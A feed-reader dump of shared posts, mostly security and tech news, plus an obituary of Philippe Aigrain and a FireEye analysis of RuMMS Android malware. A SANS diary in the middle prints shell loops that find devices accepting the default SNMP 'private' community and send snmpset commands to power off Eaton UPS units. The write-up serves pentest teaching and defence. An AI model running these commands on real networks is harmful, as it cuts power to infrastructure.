Shared posts

20 Jul 14:39

In memoriam Philippe Aigrain (1949-2021)

by martin

It is with great sadness that we learned of the death of Philippe Aigrain on Sunday 11th of July, in the mountains, near his home in the French Pyrénées.

Philippe was a computer scientist and a great humanist, a tireless activist, a researcher and an intellectual who helped us see things more clearly in these troubled times. Philippe was one of the historical co-founders of La Quadrature du Net in 2008 and went on to become President of the Association from 2013 to 2017. As a young man, he had taken part in the May 1968 uprising. He was later a fellow traveler of the Free Radio Movement in the 1970s, before exploring the democratic potential of the Internet and becoming an ardent defender of Free Software and the Commons. In recent years, he focused on solidarity in refugee reception, and directed the publishing house PublieNet, while also publishing poems of his own and, more recently, his first novel, Sœur(s).

Philippe was one of those people who immediately commanded respect and admiration for his exceptional human qualities, his immense kindness and great sensitivity, but also for the depth of his thinking, his curiosity, his generosity, his ability to combine knowledge from the many fields he was versed in. All of this allowed him not only to move easily between activist, intellectual and artistic communities around the world, but also to make valuable contributions and build bridges between them.

At La Quadrature, he was a role model for many of us, a mentor and a friend. Always curious, open, but also very supportive of people new to the organisation. He was one of the pillars that kept us going and got us through tough times. We admired his capacity for indignation, the thoroughness and depth of his analyses, the way he could set aside certain activist reactions to size up a situation in all its complexity. When there was a risk of drowning in the details of an issue, he would encourage us to step back and return to the fundamental political issues at stake. During an internal debate at the end of 2016, we were discussing our position on the creation of the TES biometric file in France, which the government was then presenting as a way of fighting “identity fraud”… We were cooking up arguments that were a little too technical and legal for his liking. He got everyone on the same page by referring to the Resistance during WWII and reminding us that forgery-proof identity documents are simply contrary to a democratic way of life.

Right from the beginning, Philippe insisted that La Quadrature should be proactive and produce positive proposals. He created an entire system to allow the public and creators to engage around their works by allowing the free sharing of these works, while financially supporting and encouraging creation. He was the instigator of the Creative Contribution, an avant-garde idea allowing generalised access to culture balanced with material support for creation. With Lionel Maurel, he compiled these proposals in the positive proposals for copyright reform, published by La Quadrature following the rejection of the ACTA anti-counterfeiting trade agreement, in the summer of 2012.

Over all these years, Philippe taught us that it is possible to combine a lucid view of the world and a high level of political commitment, while never forsaking either care for others or for oneself, nor indeed joy and poetry.

We will take the time to honor his memory. We will keep his legacy alive by continuing the fight, whether for Human Rights in the digital environment, the sharing of knowledge or, simply, for more beauty and humanity in this world.

For now, our thoughts and sympathy are with his wife Mireille, his daughters and his grandchildren.

  • Sister(s), a novel addressing the issues of surveillance, published September 2020 by Publienet.
  • Sharing, Culture and the Economy in the Internet Age, a plea for the right to non-market sharing of cultural works, published in 2011 by the University of Amsterdam Press.
  • Cause Commune, an essay in favor of the information commons and against intellectual property, published in 2005 by Fayard.
  • Some of Philippe’s poems can be found here https://www.atelierdebricolage.net/
11 Jul 08:40

Par TropGentil

Aujourd’hui, j’ai tellement peur de faire du mal au gens que j’ai menti à ma copine en lui disant que je l’avais moi aussi trompée quand elle m’a annoncé l’avoir fait. Pour ne pas la faire culpabiliser. VDM
29 Nov 10:20

Énorme bug macOS : l'accès root sans mot de passe

Une grosse faille de sécurité frappe macOS High Sierra. Elle permet d'obtenir un accès administrateur à l'ordinateur Mac sans mot de passe. En local, la simplicité d'exploitation laisse sans voix.
20 Nov 12:40

Connaissance du 12/11/2017

La colonne de la place Vendôme, à Paris, fut érigée par Napoléon en 1810. Elle est recouverte d'un parement coulé avec le bronze des canons pris aux armées russes et autrichiennes lors de la bataille d'Austerlitz.
14 Nov 11:48

OnePlus : un accès root direct caché dans ses smartphones

Une application préinstallée dans les smartphones OnePlus fonctionne comme une backdoor donnant un accès root, sans avoir besoin de déverrouiller le bootloader.
01 Nov 17:33

17 avril 1975, les Khmers Rouges entrent à Phnom Penh

by podcast@radiofrance.com
durée : 00:52:49 - Affaires sensibles - par : Fabrice DROUELLE - Aujourd’hui dans Affaires Sensibles, le premier volet de notre série sur l’histoire du génocide cambodgien. - invités : Patrice DE BEER - Patrice DE BEER - réalisé par : Fabrice Laigle
23 Oct 12:26

Google to add "DNS over TLS" security feature to Android OS

by noreply@blogger.com (Mohit Kumar)
No doubt your Internet Service Provides (ISPs), or network-level hackers cannot spy on https communications. But do you know — ISPs can still see all of your DNS requests, allowing them to know what websites you visit. Google is working on a new security feature for Android that could prevent your Internet traffic from network spoofing attacks. Almost every Internet activity starts with a
18 Oct 09:09

Peeking into .msg files, (Sun, Oct 15th)

Readers often submit malware samples, and sometimes the complete email with attachment. For example exported from Outlook, as a .msg file.

Did you know that .msg files use the Compound File Binary Format (what I like to call OLE files), and can be analysed with oledump?

Reader Carlos Almeida submitted a .msg file with malicious .rar attachment.

I'm not that familiar with .msg file intricacies, but by looking at the stream names and sizes, I can often find what I'm looing for:

Stream 53 seems to contain the message:

From this hex-ascii dump, you can probably guess that the message is stored in UNICODE format. We can use option -t (translate) of oledump to decode it as UTF-16:

Stream 43 contains the headers. I don't want to disclose private information like our reader's email address, so I grepped for some headers that I can disclose:

The Subject header is encoded according to RFC1342 because the subject contains non-ASCII characters. It decodes to this:

These are chinese characters that seem to mean the same as FW: (forwarding).

Stream 3 contains the attachment:

You can see it's a RAR file.

I use 7zip to look into it, and it should be possible to do this without writing the file to disk, by just piping the data into 7zip (options -si and -so can help with piping). But unfortunately, I got errors trying this and resigned to saving it to disk:

It contains an unusually large .bat file:

It's actually a PE file:

This looks to be a VB6 executable (from the PEiD signature), I should dig up my VB6 decompiler and try to take a closer look.

Of course, it's malware.

 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
13 Oct 09:31

Palo Alto Networks se prépare à proposer la technologie de LightCyber

by LeMagIT(editor@www.fr)
A l’occasion des Assises de la Sécurité, René Bonvanie, directeur marketing de Palo Alto Networks, a indiqué que l’équipementier prévoit d’apporter à ses clients cette technologie d’ici la fin de l’année.
13 Oct 09:24

More and more websites are mining crypto-coins in your browser to pay their bills, line pockets (The Register)

09 Oct 12:19

A strange JPEG file, (Sun, Oct 8th)

I had a JPEG file to analyze that would not render properly: image viewers would display an error, but no image.

My new jpegdump tool confirmed that it started with the right JPEG markers, but that the data sizes were wrong:

2576 bytes for an APP0 marker is really large...

Taking a look with a hex editor, I saw that the markers were present, but that the size of the data were wrong.

With re-search, I took a closer look at the markers with their data size:

The size of the data following a marker is encoded with two bytes, big endian notation. And for the first markers in the JPEG file, they all looked too large. Then I noticed that the 3rd byte (e.g. the first byte of the size field) was always 0x0A, were I expected it to be 0x00.

Counting all the bytes reveals that in this file, there were no 0x00 bytes but an unusual large amount of 0x0A bytes:

I formed a hypothesis: somehow, all 0x00 values were replaced by 0x0A values. To test this hypothesis, I replaced all 0x0A values by 0x00 values and parsed the result with jpegdump:

This was indeed a JPEG file. But I could not repair it, as I did not know what 0x0A values were original bytes, and which were replacemnt values for 0x00.

At least I new it was most likely not malicious, but corrupted by some unknown process.

 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
05 Oct 14:33

Emmanuel Macron : le vote en ligne aux législatives pour les Français de l'étranger

Utilisé en 2012 mais suspendu en 2017, le vote en ligne aux législatives pour les Français de l'étranger reviendra en 2022. Une demande du président de la République.
02 Oct 15:45

VideoLAN a refusé des dizaines de millions de dollars pour placer de la pub dans VLC

by Julien Lausson

euro-billet-argent

Saviez-vous que le président de VideoLAN a refusé des dizaines de millions de dollars en échange de l'ajout de publicités et de bouts de code douteux dans VLC ? Connaissez-vous l'histoire de l'icône du lecteur multimédia ? Ou du risque que font peser la NSA et la CIA sur le projet ? Non ? Alors, il est temps de lire les réponses que le président de VideoLAN a données aux questions des internautes. [Lire la suite]
25 Sep 16:50

The birth of a ninja

by noreply@9gag-rss.com
25 Sep 15:47

Cacher des objets derrière un "rideau optique"

Là vous le voyez, là vous ne le voyez plus! La cape d'invisibilité se rapproche de la réalité. La photonique est un secteur qui connaît une croissance rapide et qui permet de commencer à envisager...
24 Oct 06:20

Dyn issues affecting joint customers

by Filippo Valsorda

Today there is an ongoing, large scale Denial-of-Service attack directed against Dyn DNS. While Cloudflare services are operating normally, if you are using both Cloudflare and Dyn services, your website may be affected.

Specifically, if you are using CNAME records which point to a zone hosted on Dyn, our DNS queries directed to Dyn might fail making your website unavailable, and presenting a “1001” error message.

Some popular services that might rely on Dyn for part of their operations include GitHub Pages, Heroku, Shopify and AWS.

1001 error

As a possible workaround, you might be able to update your Cloudflare DNS records from CNAMEs (referring to Dyn hosted records) to A/AAAA records specifying the origin IP of your website. This will allow Cloudflare to reach your origin without the need for an external DNS lookup.

Note that if you use different origin IP addresses, for example based on the geographical location, you may lose some of that functionality by using plain A/AAAA records. We recommend that you provide addresses for many of your different locations, so that load will be shared amongst them.

Customers with a CNAME setup (which means Cloudflare is not configured in your domain NS records) where the main zone is hosted on a Dyn service will be affected as well. You might be able to make Cloudflare your authoritative DNS provider by contacting support and asking to be changed to Full mode and then updating your nameservers at your registrar, but the change can take up to 48h to propagate.

Please note that the Cloudflare status page and support system might be affected by the ongoing attack, since they are hosted on third parties, as per industry best practices.

06 Oct 12:02

TCP joke

by noreply@9gag-rss.com
29 Sep 12:59

SNMP Pwn3ge, (Wed, Sep 28th)

Sometimes getting access to company assets is very complicated. Sometimes it is much easier (read: too easy) than expected. If one of the goals of a pentester is to get juicy information about the target, preventing the IT infrastructure to run efficiently (deny of service) is also a win. Indeed, in some business fields, if the infrastructure is not running, the business is impacted and the company may lose a lot of money. Think about traders.

I was recently involved in a pentest with the goal to test the customers internal network. The scope was easy: to come on site,connect your laptop to a free network port and see what you can find/do. In such scenario, the breaking point is to successfully be connected to the network. If Mr DHCP is kind enough to provide you an IP address, you are in and you may consider the network as already compromised. This was the case for me, no protection against rogue devices, no network access control. I launched my Ettercap and started to sniff some packets playing MitM. I immediately grabbed some nice SNMP packets with interesting communities like public and private. As you probably know, those are the default ones on many systems. public provides usually a read-only access and private is used in read-write mode. Often, I hear this comment: But SNMP is just a monitoring protocol, why should I care?. Wrong! SNMP, as described by RFC 3411[1], meansSimple Network Management Protocol and not Monitoring Protocol. If you have SNMP read access to a device, you can collect interesting information (version, processes, IP information, health) for the reconnaissance phase. But if you have SNMP write access to a device, you can alter his configuration and cause much more damages

During"> # nmap -Pn -sU -p 161 -v -oA snmp 192.168.1.0/24# grep 161/open/udp snmp.gnmap | awk { print $2 } | while read IPdo snmpwalk -v1 -c private $IP /dev/null 21 if [ $? == 0 then echo $IP accepts private community echo $IP vulnerable_ip.tmp fidone

The next step was to identify the vulnerable devices. This information is discoverable with the OID"> # snmpwalk -v1 -On -c xxxxxxxxx 192.168.254.4 SNMPv2-MIB::sysDescr.0.1.3.6.1.2.1.1.1.0 = STRING: Cisco IOS Software, C1600 Software (AP1G2-K9W7-M), Version 15.2(2)JB2, RELEASE SOFTWARE (fc1)

Guess what? Most vulnerable devices were UPS management systems configured with default settings or, more precisely, not configured at all. The next step was to browse the vendor MIB (Management Information Base). The vendor ID was534 and is assigned to Eaton Corporation [2]. The MIB reveals someinteresting read/write OIDs like this one: 1.3.6.1.4.1.534.1.9.1. This OID is called xupsControlOutputOffDelay. Here is the description:

Setting this value to other than zero will cause the UPS output to turn off after the number of seconds. Setting it to 0 will cause an attempt to abort a pending shutdown.

We are close to perform a nice DoS against the customers infrastructure. How? A simple snmpset command will help us. Let"> for IP in cat vulnerable_ip.tmpdo snmpset -c private -v1 $IP 1.3.6.1.4.1.534.1.9.1 i 10 echo -n $IP d=10 do echo -n . done echo Tango down!done

Game over! Note that this is a proof of concept. In most pentestengagements, youre not allowed to perform such actions.

It is a pity that such very simple attack is still possible in 2016! If the customer followed the SANS Top-20 controls[3], this attack wouldnt be possible:

  • CSC1 -Inventory of authorized and unauthorized devices
  • CSC4 -Continuous vulnerability scanning, assessment, and remediation
  • CSC9 -Limitation and control of network ports, protocols, and services
  • CSC11 -Secure configuration for network devices such as firewalls, routers, and switches

[1] https://www.ietf.org/rfc/rfc3411.txt
[2] https://www.iana.org/assignments/enterprise-numbers/enterprise-numbers
[3]https://www.sans.org/media/critical-security-controls/critical-controls-poster-2016.pdf

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
29 Sep 10:02

In the Robot Skies : un film entièrement tourné par des drones autonomes

by Julien Lausson

in-the-robot-skies-trailer

Le film In the Robot Skies ne se contente pas de raconter une histoire où les drones tiennent une place importante. Il a aussi été tourné en utilisant des drones autonomes. [Lire la suite]
20 Sep 10:37

Watch Chinese Hackers Control Tesla's Brakes From 12 Miles Away

by Thomas Fox-Brewster
First ever remote Tesla hack sees brakes killed and the boot opened mid-drive, Tencent security researchers claim.
19 Sep 11:35

Equation Group était capable d’extraire les clés VPN des pare-feu Cisco PIX

by UnderNews
logo-nsa
Les documents de la récente fuite ayant touché le groupe de pirates Equation Group ont pu être rapproché à ceux des révélations d'Edward Snowden. Une faille dans les pare-feu Cisco permettait à la NSA de s'emparer des clés VPN et de déchiffrer jusqu'à un millier de connexion VPN à l'heure.
05 Sep 08:39

Outsourcing en baisse sur fond de percée IaaS/SaaS en EMEA

by Maryse Gros
Pour le 2ème trimestre 2016, l’index ISG portant sur les contrats d’externalisation ayant une valeur annuelle supérieure à (...)
27 Jun 09:56

Les données de 112.000 policiers français et de leurs proches dans la nature

C'est la base de données de la Mutuelle Générale de la Police qui a été compromise. Mais il ne s'agirait pas d'une attaque, plutôt d'une vengeance.
13 Jun 10:26

Symantec rachète Blue Coat pour 4,65 Md$

by Maryse Gros avec IDG News Service
L’éditeur de solutions de sécurité Symantec rachète Blue Coat, spécialisé dans la cybersécurité, (...)
18 May 08:15

Dépitée, la Quadrature du Net ne se battra plus frontalement contre les lois

by Guillaume Champeau

Adrienne Charmet-Alix, directrice des campagnes de la Quadrature du Net.

Signe supplémentaire que les institutions dites « démocratiques » peinent de plus en plus à convaincre de leur efficacité démocratique, la Quadrature du Net explique mardi qu'elle est fatiguée de se battre sur les terrains parlementaires, et préfère réorienter son action au plus près du public. [Lire la suite]
17 May 14:22

Cisco : faille critique dans ses systèmes de téléprésence

La vulnérabilité, corrigée, permet une prise de contrôle à distance des équipements. Cisco annonce également d'autres patchs.
26 Apr 12:57

RuMMS: The Latest Family of Android Malware Attacking Users in Russia Via SMS Phishing

by Wu Zhou
Introduction

Recently we observed an Android malware family being used to attack users in Russia. The malware samples were mainly distributed through a series of malicious subdomains registered under a legitimate domain belonging to a well-known shared hosting service provider in Russia. Because all the URLs used in this campaign have the form of hxxp://yyyyyyyy[.]XXXX.ru/mms.apk (where XXXX.ru represents the hosting provider’s domain), we named this malware family RuMMS.

To lure the victims to download the malware, threat actors use SMS phishing – sending a short SMS message containing a malicious URL to the potential victims. Unwary users who click the seemingly innocuous link will have their device infected with RuMMS malware. Figure 1 describes this infection process and the main behaviors of RuMMS.

Figure 1. Overview of the RuMMS campaign and behaviors

On April 3, 2016, we still observed new RuMMS samples emerging in the wild. The earliest identified sample, however, can be traced back to Jan. 18, 2016. Within this time period, we identified close to 300 samples belonging to this family (all sample hashes are listed in the Appendix).

After landing on the victim’s phone, the RuMMS apps will request device administrator privileges, remove their icons to hide themselves from users, and remain running in the background to perform a series of malicious behaviors. So far we have identified the following behaviors:

●      Sending device information to a remote command and control (C2) server.

●      Contacting the C2 server for instructions.

  • Sending SMS messages to financial institutions to query account balances.
  • Uploading any incoming SMS messages (including the balance inquiry results) to the remote C2 server.
  • Sending C2-specified SMS messages to phone numbers in the victim’s contacts.
  • Forward incoming phone calls to intercept voice-based two-factor authentication.

Each of these behaviors is under the control of the remote C2 server. In other words, the C2 server can specify the message contents to be sent, the time period in which to forward the voice call, and the recipients of outgoing messages. As part of our investigation into this malware, we emulated an infected Android device in order to communicate with the RuMMS C2 server. During one session, the C2 server commanded our emulated device to send four different SMS messages to four different phone numbers, all of which were associated with Russian financial institutions. At least three of the messages were intended to check a user’s account balance at the institution (we could not confirm the purpose of the fourth).Through additional research, we identified several forum posts where victims complained of funds (up to 600 rubles) were transferred out of their accounts after RuMMS infected their phones.

We do not know exactly how many people have been infected with RuMMS malware. However, our data suggests that there have been at least 2,729 infections between January 2016 and early April 2016, with a peak in March of more than 1,100 infections.

Smishing: The Major Way To Distribute RuMMS

We have not observed any instances of RuMMS on Google Play or other online app stores. Smishing (SMS phishing) is currently the primary way threat actors are distributing the malware. The process starts when an SMS phishing message arrives at a user’s phone. An example SMS message is shown in Figure 1. The message translates roughly to“ You got a photo in MMS format: hxxp://yyyyyyyy.XXXX.ru/mms.apk.”

So far we identified seven different URLs being used to spread RuMMS in the wild. All of the URLs reference the file “mms.apk” and all use the domain “XXXX.ru”, which belongs to a top five shared hosting platform in Russia (the domain itself has been obfuscated to anonymize the provider).

The threat actors registered at least seven subdomains through the hosting provider, each consisting of eight random-looking characters (asdfgjcr, cacama18, cacamadf, konkonq2, mmsmtsh5, riveroer, and sdfkjhl2.) As of this writing, no files were hosted at any of the links. The threat actors seem to have abandoned these URLs and might be looking into other ways to reach more victims.

Use of a shared hosting service to distribute malware is highly flexible and low cost for the threat actors. It is also much harder for network defenders or researchers to track a campaign where the infrastructure is a moving target. Many top providers in Russia offer cheap prices for their shared hosting services, and some even provide free 30-day trial periods. Threat actors can register subdomains through the hosting provider and use the provider’s services for a short-period campaign. A few days later they can cancel the trial and do not need to pay a penny. In addition, these out-of-the-box hosting services usually provide better infrastructure than the attackers could manage to construct (or compromise) themselves.

RuMMS Code Analysis

All RuMMS samples share the same behaviors, major parts of which are shown in Figure 1. However, the underlying code can be quite different in that various obfuscation mechanisms were adopted to evade detection by anti-virus tools. We used a sample app named “org.starsizew” with an MD5 of d8caad151e07025fdbf5f3c26e3ceaff to analyze RuMMS’s code.

Several of the main components of RuMMS are shown in Figure 2. The activity class “org.starsizew.MainActivity” executes when the app is started. It first starts another activity defined in “org.starsizew.Aa” to request device administrator privileges, and then calls the following API of “android.content.pm.PackageManager” (the Android package manager to remove its own icon on the home screen in order to conceal the existence of RuMMS from the user:

            setComponentEnabledSetting(MainActivity.class, 2, 1)

At the same time, ”org.starsizew.MainActivity” will start the main service as defined in “org.starsizew.Tb”, and use a few mechanisms to keep the main service running continuously in the background. The class “org.starsizew.Ac” is designed for this purpose; its only task is to check if the main service is running, and restart the main service if the answer is no. The class “org.starsizew.Tb” also has a self-monitoring mechanism to restart itself when its own onDestroy API is triggered. Other than that, its major functionality is to collect private device information, upload it to a remote C2 server, and handle any commands as requested by the C2 server. All those functions are implemented in asynchronous tasks by “org.starsizew.i”.

Figure 2. Android Manifest File of RuMMS

The class “org.starsizew.Ma” is registered to intercept incoming SMS messages, the arrival of which will trigger the Android system to call its “onReceive” API. Its major functionality is also implemented through the call of the asynchronous task (“org.starsizew.i”), including uploading the incoming SMS messages to the remote C2 server and executing any commands as instructed by the remote attacker.

C2 Communication

The C2 communication includes two parts: sending information to the remote HTTP server and parsing the server’s response to execute any commands as instructed by the remote attackers. The functionality for these two parts is implemented by doInBackground and onPostExecute respectively, two API methods of “android.os.AsyncTask” as extended by class “org.starsizew.i”.

Figure 3. Method doInBackground: to send information to remote C2 server

As seen from the major code body of method doInBackground shown in Figure 3 (some of the original classes and methods are renamed for easier understanding), there are three calls to HttpPost with different contents as parameters. At line 5, local variable v4 specifies the first parameter url, which can be changed by the remote C2 server later. These URLs are all in the form of “http://$C2.$SERVER.$IP/api/?id=$NUM”. The second parameter is a constant string “POST”, and the third parameter is a series of key-value pairs to be sent, assembled at runtime. The value of the first item, whose key is “method” (line 7), indicates the type of the contents: install, info and sms.

The first type of content, starting with “method=install”, will be sent when the app is started for the first time, including the following device private information:

  • Victim identifier
  • Network operator
  • Device model
  • Device OS version
  • Phone number
  • Device identifier
  • App version
  • Country

Figure 4 is an example of this string as seen by the FireEye Mobile Threat Prevention platform.

Figure 4. Example HTTP post message

The second type of information will be sent periodically to indicate that the device is alive. It only has two parts, the method indicated by word “info” and the victim identifier. The third type of information will be sent when RuMMS intercepts any SMS messages, including the balance inquiry results when it contacts the SMS code of a particular financial service.

Method onPostExecute parses the response from the above HTTP session and executes the commands provided by the remote attacker. As seen from the code in Figure 5, the commands RuMMS supports right now include:

  • install_true: to modify app preference to indicate that the C2 server received the victim device’s status.
  • sms_send: to send C2-specified SMS messages to C2-specified recipients.
  • sms_grab: to upload periodically the SMS messages in the inbox to C2 server.
  • delivery: to deliver specified text to all victim’s contacts (SMS worming).
  • call_number: to forward phone calls to intercept voice based two-factor authentication.
  • new_url: to change the URL of the C2 server in the app preference.
  • ussd: to call a C2-specified phone number.

Figure 5. Method onPostExecute: to handle instructions from remote C2

Figure 6 shows an example response sent back from one C2 server. Note that inside this single response, there is one “install_true” command, one “sms_grab” command and four “sms_send” commands. With the four “sms_send” commands, the messages as specified in the key “text” will be sent immediately to the specified short numbers. Our analysis suggests that the four short numbers are associated with Russian financial institutions, presumably where a victim would be likely to have accounts.

Figure 6. Example Response in JSON format

In particular, short number “+7494” is associated with a payment service provider in Russia. The provider’s website described how the code 7494 can be used to provide a series of payment-related capabilities. For example, sending text “Balance” will trigger a response with the victim’s wallet balance. Sending text “confirm 1” will include proof of payment. Sending text “call on” will activate the USSD payment confirmation service.

During our investigation, we observed the C2 server sending multiple “balance” commands to different institutions, presumably to query the victim’s financial account balances. RuMMS can upload responses to the balance inquiries (received via SMS message) to the remote C2 server, which can send back additional commands to be sent from the victim to the provider’s payment service. These could include resetting the user’s PIN, enabling or disabling various alerts and confirmations, and confirming the user’s identity.

RuMMS Samples, C2, Hosting Sites, Infections and Timeline

In total we captured 297 RuMMS samples, all of which attempt to contact an initial C2 server that we extracted from the app package. Figure 7 lists the IP addresses of these C2 servers, the number of RuMMS apps that connect to each of them, and the example URL used as the first parameter of the HttpPost operation (used in the code of Figure 3). This indicates that multiple C2 servers were used in this campaign, but one (37.1.207.31) was the most heavily used.

Figure 7. RuMMS samples and C2 servers

Figure 8 shows how these samples, C2 servers and hosting websites are related to each other, including when they were compiled or observed. In the quadrant, the smaller boxes in blue-gray represent particular apps in the RuMMS family, while the bigger boxes in deep-blue represent C2 servers used by some RuMMS apps. The dotted arrows represent the use of a particular C2 server by a specific app to send information and fetch instructions. In this figure we have 11 RuMMS samples, all of which were hosted on the website as shown in the “y” axis. The dates on the “x” axis show the dates when we first saw these apps in the wild. This figure demonstrates the following interesting information:

The time range when threat actors distributed RuMMS on those shared-hosting websites is from January 2016 to March 2016.

  • Threat actors used different websites to host different payloads at different times. This kind of “moving target” behavior made it harder to track their actions.
  • The same websites have hosted different RuMMS samples at different dates.
  • C2 servers are shared by multiple samples. This matches our observations of C2 servers as shown in Figure 7.

Figure 8. RuMMS samples, hosting sites, C2 servers from Jan. 2016 to Mar. 2016

We do not know exactly how many people have been infected with RuMMS malware; however, our data suggests that there are at least 2,729 infections with RuMMS samples from January 2016 to early April 2016.

Figure 9 shows the number of RuMMS infections recorded in the last four months. When we first observed the malware in January, we recorded 380 infections. In February, we recorded 767 infections. In March, it peaked at 1,169 infections. In April, at the time of writing this post, we recorded 413 RuMMS infections. Although the propagation trend seems to be slowing down a bit, the figure tells us that RuMMS malware is still alive in the wild. We continue to monitor its progress.

 

Figure 9. RuMMS infections from Jan. 2016 to Apr. 15, 2016

Conclusion

Smishing (SMS phishing) offers a unique vector to infect mobile users. The recent RuMMS campaign shows that Smishing is still a popular means for threat actors to distribute their malware. In addition, the use of shared-hosting providers adds flexibility to the threat actor’s campaign and makes it harder for defending parties to track these moving targets.

Fortunately, FireEye Mobile Threat Prevention platform can recognize the malicious SMS and networking behaviors used by these RuMMS samples, and help us quickly identify the threat. To protect yourself from these threats, FireEye suggests that users:

  • Take caution before clicking any links where you are not sure about the origin.
  • Don’t install apps outside the official app store.

To detect and defend against such attacks, we advise our customers to deploy our mobile security solution, FireEye MTP/MSM. This helps our clients gain visibility into threats in their user base, and also enables them to proactively hunt down devices that have been compromised. In addition, we advise our customers with NX appliances to ensure that Wi-Fi traffic is scanned by NX appliances to extend coverage to mobile devices.

Appendix: RuMMS Sample Hashes

016410e442f651d43a7e28f72be2e2ef

 01d95061091d4f6f536bada821461c07

 0328121ca8e0e677bba5f18ba193371c

 03a442b0f7c26ef13a928c7f1e65aa23

 03c85cb479fd9031504bba04c2cefc96

 053c247a1c176af8c9e42fe93fb47c9d

 064799b5c74a5bae5416d03cf5ff4202

 066e171fc083c5e21ac58026870a4ae8

 0749e775f963fdab30583914f01486e3

 081b04697f96568356d7b21ac946fb7c

 0927b599d9599dcd13b6ef5f899ef4d9

 0964ee11f6d19c2297bce3cb484a2459

 0a22ceac6a0ee242ace454a39bff5e18

 0a3b9c27b539498b46e93dbdcfb3de1e

 0abf7a57855c2312661fdc2b6245eef8

 0c3dbcffb91d154b2b320b2fce972f39

 0c75764d172364c239fc22c9c3e21275

 0dd1d8d348a3de7ed419da54ae878d37

 0dd40d2f4c90aec333445112fb333c88

 0e89415cdd06656d03ef498fd1dd5e9b

 0e8ef8108418ca0547b195335ee1dd2c

 0ea83ffc776389a19047947aba5b4324

 0f280e86268da04dc2aa65b03f440c1a

 0f5a6b34e952c5c44aa6f4a5538a6f2b

 0fa1ffbcfe0afc6a4a57fed513a72eb6

 104859f80028792fbd3a0a0ea1e6fd78

 10c58dd41d95a81b1043059563860c1c

 11d425602d3c8311d1e18df35db1daa3

 120561bfced94cc1ce5cda03b203dbf8

 128576fbdb7d2980c5a52cd3286bcca8

 14a8246474ed819a4dfcc3cb06e98954

 14c7f0dc55b5dd0c7e39f455baae3089

 1693f424742279a8678322a012222a02

 16b778921b6db27a2af23dd8ce1fac3e

 16ec62c1d7d4ac3f3d7d743fc1e21bf6

 1711081b5ba5c3941ae01d80819c7530

 177af9700bcc8b7c8c131b662e8cdda8

 17bfe26e9a767c83df2aab368085e3c2

 17d083988dd5e6d9c2517899ae30bb02

 1850c020edafcf8254279e352ce33da9

 18d1b845b2ee1960b304ab2fd3bfe11b

 1b4b6bf1e40d5954b34a815d1438efd9

 1cbedd5cc8e9b59f90ec81a5aec0239f

 1cead79dfdaee9d7eb914a5b13a323ea

 1dc8e18e610fd921ffa638b3f51de4b2

 1ed3c0158eb960bb47847596a69a744c

 2177a3094dd06f9d777db64364d3fc2c

 220fc807884acfcd703596994e202f21

 244b965d3816ac828d21c04bcf0519a4

 24f23fe808ba3f90a7a48eae37ce259d

 2745bc6f165ae43f1edf5cd1e01db2c5

 2802552e2aa5491ebbf28bfef85618cb

 29a8eef1b304d53f303d03ba6994ed32

 2a1c02bd4263a4e1cb6f648a9da59429

 2a6c086c589d1b0a7d6d81c4e4c70282

 2ac5e8e2fd8050330863875d5018cb59

 2c200cfcc5f4121fb70b1c152357225b

 2cb75f46b901c17b2f0a9cb486933d65

 2cd1908f4846e81e92f82684d337e858

 2ce248b19c30a9fed4cd813c23831d7a

 2cf5b053bf51e9ff8ea653da5523b5f1

 2e44ffbaa24c1203df218be1cc28a9e5

 2e9fcd26fdeeed19f0de865298d59f2e

 308bec5d52d55c00aff0b561e7975bdf

 30a8c03a7d6a489da047443938e2aa20

 30c1a1a7417598fa8f23572f0f090866

 30f2b0edd191d1465bac11553d60f761

 3103bd49786d52c920e12303921bd2f1

 3131d58ace4f3485dcc2581be3fcfb42

 315a713c65baf5390fcf4232df3d1669

 318513f9f14fbf78ec037b62b221c91b

 3199b7e9b27c1aa619bc6959c6eab458

 31eddefcadb1d4a6bbc55e610d085638

 34788c0c80687e1488d3c9b688de9991

 34e8dfc3d5fe5a936d556ac79e53412f

 356393e8c85864fa2e31e30d28c13067

 35666c9ef8d3d81d8641578259982e57

 37506bcd79e0a39d56edda2f0713ce34

 38b9c800c9787ea6de3f5a9436444435

 391a74f46c7f7c34e98be38228fc94b6

 3a0baa509a54359d10696d995dfe783e

 3abe743871688eb542a36bdd4f5ba196

 3b2dda7dafbc3f690f179999b367f743

 3b39743b98e7223c93f15026c009e2ed

 3d3dac2656f5850d6e2cababc06edd23

 3d4e135e647fba30e67415e5ebc5af42

 3de3c1ff2db0f75d18c10c1d682596a6

 3f9376bd042b5c9b111dde1b460ab9b5

 40f7cec380c6904bbeaac5c42bc99fb6

 412e4f59e3a7a7d870581e83bffa33d1

 41b946bf78606d4f94a7206f024914bf

 422fc3634a8a575945fc96bd85465275

 4294589c588b577529150b01ce588a13

 437db1d8d84e245875064ba7cccc9ae0

 44a56e288d906cbfec85f6715554f83b

 472187a7eba0fd0479130711df34a409

 4827e46a2382fdfa2847db0d376c2c52

 48378433f79ac304d0bb86ee6f99958e

 4841a521f95ea744243566cc69904bd1

 4aa78398d9a927d2c67bf6a5fb0c8db8

 4b478ad35ad285ff4ff2623cb8c63ff7

 4be9cb7e3cdab4766411a0d2506a2cf7

 4d7ce984313b06835b72a4e6ad6e61fa

 4e60269982182b1cb8139dd5159a6b78

 4ed59658844835a222e09c6ca5701bf8

 4eda51773b46975d47b8932fee4cd168

 4f837a3eee0a228c1c7cb13916f14fe8

 4fad9557973f3451be04efbbf9f51b8d

 4faefac63b3876604945f11effc6042a

 5044a06f037118627899abd1229895fe

 50aa9c662a508c9a9bda508bbb5b4ac7

 50cccf3ee065977de3a2c07249313411

 512c580db356e18c51b051a7b04fa0c1

 5144790d272daacc7210fc9e2ae41f12

 516d74358ef2f61fbb90e9d1a17f59f9

 52c5cc858d528fd0554ef800d16e0f8f

 53281564e50a8dfab1d7d068f5f3bae3

 53baf60ae4611b844e54a600f05c9bbf

 5510c69693819baf9ad2e4a346f805b0

 5527ffe6768f3b61d69ee83039f6e487

 5678e4c2cfe9c2bd25cde662b026550e

 56d95aa243571ccd85b516d0f393ed37

